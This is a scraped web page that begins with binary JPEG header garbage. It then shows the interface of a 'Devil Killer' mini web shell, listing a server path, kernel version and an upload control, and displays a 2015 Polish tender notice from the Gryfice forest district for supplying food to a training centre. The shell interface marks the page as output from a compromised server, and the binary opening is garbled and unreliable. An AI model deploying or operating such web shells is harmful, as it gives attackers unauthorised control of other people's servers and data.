JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150121/8887-N-2015.html

<p class="kh_header"><b>Gryfice: Dostawa artykułów spożywczych do Ośrodka Szkoleniowo Wypoczynkowego Lasów Państwowych Bażyna w Pogorzelicy</b><br>
<b>Numer ogłoszenia: 8887 - 2015; data zamieszczenia: 21.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Gryfice , Osada Zdrój 1, 72-300 Gryfice, tel. 091 3843321; 3842516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gryfice.szczecin.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Gryfice..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Ośrodka Szkoleniowo Wypoczynkowego Lasów Państwowych Bażyna w Pogorzelicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych do Ośrodka Szkoleniowo Wypoczynkowego Lasów Państwowych w Pogorzelicy, ul. Wojska Polskiego 15, 71-351 Pogorzelica.
Przedmiot zamówienia podzielony jest na 9 części:

Część Nr 1 - Dostawa jaj 
Część Nr 2 - Dostawa produktów nabiałowych
Część Nr 3 - Dostawa pieczywa świeżego i ciast  
Część Nr 4 - Dostawa warzyw i owoców 
Część Nr 5 - Dostawa mięsa, drobiu i wędlin 
Część Nr 6 - Dostawa produktów suchych i konserwowych 
Część Nr 7 - Dostawa napojów, soków i wody
Część Nr 8 - Dostawa produktów mrożonych
Część Nr 9 - Dostawa ryb i ich przetworów  

Szczegółowy opis przedmiotu  zamówienia dla poszczególnych części zamówienia podano w Załączniku nr 2A do 2I do Specyfikacji Istotnych Warunków Zamówienia (zwanej dalej SIWZ). W załączniku nr 2A do 2I podano maksymalne ilości poszczególnych artykułów spożywczych. Zamawiający zastrzega sobie prawo do zmniejszenia ilości zamawianych artykułów spożywczych w przypadku zaistnienia okoliczności uzasadnionych gospodarczym interesem Zamawiającego, w szczególności braku zapotrzebowania na dane artykuły  z powodu niższej niż planowana liczby gości Ośrodka Szkoleniowo Wypoczynkowego Lasów Państwowych Bażyna w Pogorzelicy w danym roku. Zmniejszenie ilości zamawianych artykułów spożywczych z ww. przyczyn nie stanowi niewykonania lub nienależytego wykonania umowy, a w związku z tym nie jest podstawą do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego.
3.6.	Artykuły spożywcze stanowiące Przedmiot umowy powinny być wytwarzane/ przetwarzane i przewożone zgodnie z przepisami ustawy  z dnia 25 sierpnia 2006 r.
o bezpieczeństwie żywności i żywienia (t.j. Dz.U. 2010, Nr 136, poz. 914 ze zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.50.00.00-3, 15.81.00.00-9, 15.84.23.00-5, 15.30.00.00-1, 15.10.00.00-9, 15.11.20.00-6, 15.11.30.00-3, 15.11.11.00-0, 15.80.00.00-6, 15.89.40.00-1, 15.84.23.00-5, 15.30.00.00-1, 15.87.00.00-7, 15.98.00.00-1, 15.98.20.00-5, 15.32.10.00-4, 15.98.10.00-8, 15.33.11.70-9, 15.11.20.00-6, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:
Część Nr  1 - Dostawa jaj - 100,00 zł
Część Nr  2  - Dostawa produktów nabiałowych   - 500,00 zł
Część Nr  3 - Dostawa pieczywa świeżego i ciast - 200,00 zł
Część Nr  4 - Dostawa warzyw i owoców - 400,00 zł
Część Nr  5 - Dostawa mięsa i wędlin - 1.000,00 zł
Część Nr  6 - Dostawa produktów suchych i konserwowych - 600,00 zł
Część Nr  7 - Dostawa napojów, soków i wody - 300,00 zł
Część Nr  8 - Dostawa produktów mrożonych - 100,00 zł  
Część Nr  9 - Dostawa ryb i ich przetworów - 200,00 zł

Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przed upływem terminu składania ofert przelewem na rachunek bankowy Zamawiającego: 
80 2030 0045 1110 0000 0054 4290 
z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy oraz której części. Wadium w formie gotówki nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego (p.103).

Wadium należy wnieść przed upływem terminu składania ofert. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego. 

W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą.

W przypadku wniesienia wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
3)	kwotę gwarancji/poręczenia,
4)	zobowiązanie gwaranta/poręczyciela do bezwarunkowego zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 46 ust. 4a PZP oraz art. 46 ust. 5 PZP. 

Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust.4a PZP

Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art.46 ust.1 PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy. 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 PZP, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 PZP  lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 PZP, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia. Ocena spełnienia tego warunku będzie dokonywana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
1)	dla części nr 1 - co najmniej trzech sukcesywnych dostaw jaj wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 50,00 zł brutto,
2)	ddla części nr 2 - co najmniej trzech sukcesywnych dostaw produktów nabiałowych wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 100,00 zł brutto,
3)	dla części nr 3 - co najmniej codziennej sukcesywnej dostawy świeżego pieczywa i ciast wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 20,00 zł brutto,

4)	dla części nr 4 - co najmniej trzech sukcesywnych dostaw warzyw lub owoców wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 80,00 zł brutto,

5)	dla części nr 5 - co najmniej trzech sukcesywnych dostaw mięsa i wędlin wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 100,00 zł brutto,

6)	dla części nr 6 - co najmniej trzech sukcesywnych dostaw produktów suchych i konserwowych wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 100,00 zł brutto,

7)	dla części nr 7 - co najmniej jednej sukcesywnej dostawy napojów wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 100,00 zł brutto.

8)	dla części nr 8 - co najmniej jednej sukcesywnej dostawy produktów mrożonych wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 250,00 zł brutto,

9)	dla części nr 9 - co najmniej dwóch sukcesywnych dostaw ryb i ich przetworów wraz z usługą transportu przedmiotu zamówienia do kupującego o wartości co najmniej 100,00 zł brutto,

Ocena spełnienia tego warunku będzie dokonywana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia. Ocena spełnienia tego warunku będzie dokonywana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia. Ocena spełnienia tego warunku będzie dokonywana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową w wysokości co najmniej:
1)	dla części nr 1 - 700,00 zł.
2)	dla części nr 2 - 3.500,00 zł,
3)	dla części nr 3 - 1.400,00 zł,
4)	dla części nr 4 - 3.300,00 zł,
5)	dla części nr 5 - 7.000,00 zł,
6)	dla części nr 6 - 4.500,00 zł,
7)	dla części nr 7 - 2.200,00 zł,
8)	dla części nr 8 - 800,00 zł,
9)	dla części nr 9 - 1.700,00 zł.
Ocena spełnienia tego warunku będzie dokonywana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Częstotliwość dostaw - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany postanowień zawartej Umowy w stosunku do treści oferty Wykonawcy, możliwe są w następującym zakresie i przy zaistnieniu poniższych przesłanek:
1) zmiana wynagrodzenia Wykonawcy w przypadku zmiany przepisów prawa podatkowego, w szczególności zmiany stawki podatku od towarów i usług,
2) zmiana terminu obowiązywania umowy możliwa jest w następujących przypadkach:
a)	przedłużenia się procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez wykonawców lub inne podmioty,
b)	wystąpienia działań i zaniechań instytucji zaangażowanych w realizację, kontrolę lub finansowanie zamówienia,
c)	działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu Umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Umowy zgodnie z jej treścią, w szczególności powódź, deszcz nawalny, pożar; Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej Strony, a następnie do udokumentowania zaistnienia tego stanu,
d)	wystąpienia warunków atmosferycznych i klimatycznych uniemożliwiających realizację Przedmiotu Umowy w stopniu większym niż można byłoby to racjonalnie przewidywać,
e) wystąpienia powszechnej niedostępności surowców bądź materiałów,
f) niezrealizowania dostaw artykułów spożywczych stanowiących Przedmiot Umowy w ilości wskazanej w SIWZ w terminie obowiązywania Umowy.
3) powierzenie podwykonawcy realizacji części Umowy w zakresie nie przewidzianym w ofercie Wykonawcy - na uzasadniony wniosek Wykonawcy, za zgodą Zamawiającego.

W przypadku wystąpienia okoliczności, o których mowa w pkt 22.1. pkt 2 a-f ) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, jednakże o czas nie dłuższy niż okres trwania tych okoliczności lub czas niezbędny do usunięcia zaistniałych przeszkód lub do zrealizowania dostaw w ilości wskazanej w SIWZ. 

Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 
ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gryfice.szczecin.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Gryfice, Osada Zdrój 1, 72-300 Gryfice..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2015 godzina 09:30, miejsce: Nadleśnictwo Gryfice, Osada Zdrój 1, 72-300 Gryfice pokój nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klasa jajka: A ilość sztuk - 21500
Rozmiar jajka: M (53 - 63g)
Termin ważności: min. 14 dni
Opakowania po 30 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwośc dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa produktów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bita śmietana	Opakowanie puszka	szt	30
Jogurt naturalny	Opakowanie 300 - 1000g	kg	50
Jogurt owocowy	Opakowanie 100 - 1000g, różne smaki	kg	100
Kefir	Opakowanie 300 - 1000g	kg	20
Margaryna	Kostka 250g, tłuszcz roślinny	kg	30
Masło 82% tłuszczu	Kostka 200g, 	kg	390
Maślanka naturalna	Opakowanie 300 - 1000g	kg	4
